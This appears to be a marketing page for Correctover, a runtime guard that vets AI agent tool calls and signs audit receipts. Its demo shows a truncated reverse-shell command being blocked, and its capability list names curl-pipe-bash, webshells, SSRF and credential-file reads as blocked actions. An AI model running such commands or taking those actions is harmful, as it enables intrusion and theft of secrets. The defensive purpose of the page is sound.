IETF draft-correctover-ccs-05 · a draft, not a standard

AI Agent Authorization & Evidence

Correctover (CCS) provides semantic authorization and signed evidence for agent tool calls. It understands code intent, not keyword matches. Developer preview, source-available.

correctover — runtime guard
$ dsh plugin add correctover
✓ installed · 4 hooks active
# tool-call: exec("ls -la")
PASS normal cmd
# tool-call: bash -i >& /dev/tcp/...
BLOCK reverse shell · receipt signed
# receipt: Ed25519 ✓
1,063
weekly npm downloads · live
103
unit tests
2.7μs
P50 latency
23
DOIs · Zenodo
0
deps
Semantic Engine

Understanding intent, not keywords

The same exec() is chain-evaluated by context — blocked only when truly dangerous. Normal operations pass through.

The decision chain

Every tool call passes five semantic steps. Any of the first four matching means pass; only if none match is it judged CRITICAL — blocked, with a signed receipt.

P50 ≈ 2.7µs // per check deps: 0 // 零deps receipt: Ed25519 // signed evidence
decision-chain · exec()LIVE
dictionary-key constant?pass
▼
sandbox environment?pass
▼
code-execution engine?continue
▼
safe eval?continue
▼
none of the aboveblock + receipt
BLOCKED · Ed25519 receipt written to audit chain
Capabilities

Paired protection for each tool type

Command tools
PowerShell syntax passes; destructive commands, curl|bash, reverse shells block
File writes
Documents and code pass; webshells, backdoors, key files block
Network tools
Public URLs pass; cloud-metadata, internal, encoded SSRF block
Read tools
Normal files pass; private keys and credential files block
Output scan
Normal output passes; secret-leak alerts
Audit
Every verdict emits an Ed25519-signed receipt — traceable, non-repudiable
Standards & Evidence

Public and verifiable

2026-07-07
CCS Standard v1.0
10.5281/zenodo.21234580 · Zenodo archive
2026-08-04
CCS 7-dimension framework
2026-08-18
Tencent AI-Infra-Guard validation
arXiv:2608.16393 · 14,560 executions · DSH injection 17–25.5%
2026-08-20
Evidence Protocol draft-05
10.5281/zenodo.22020985 · IETF draft-correctover-ccs-05
Products

From free to enterprise

Open-source core
¥0
CCS standard and runtime verification
  • correctover npm plugin (DSH)
  • ccs-verifier (Python)
  • Free 200 calls/day
npm install
Early-bird
MCP Agent Security Kit
¥199one-time
51 attack vectors · 73 test cases · one-click audit
  • 51 attack-vector mappings
  • 73 test cases / 10 templates
  • HTML report + signed receipts
Buy
compliance-check
¥499/mo
MCP compliance and certificate
  • CCS v1.0 + OAuth 2.1 Audit
  • 2026-07-28 mandate
  • Compliance certificate
Start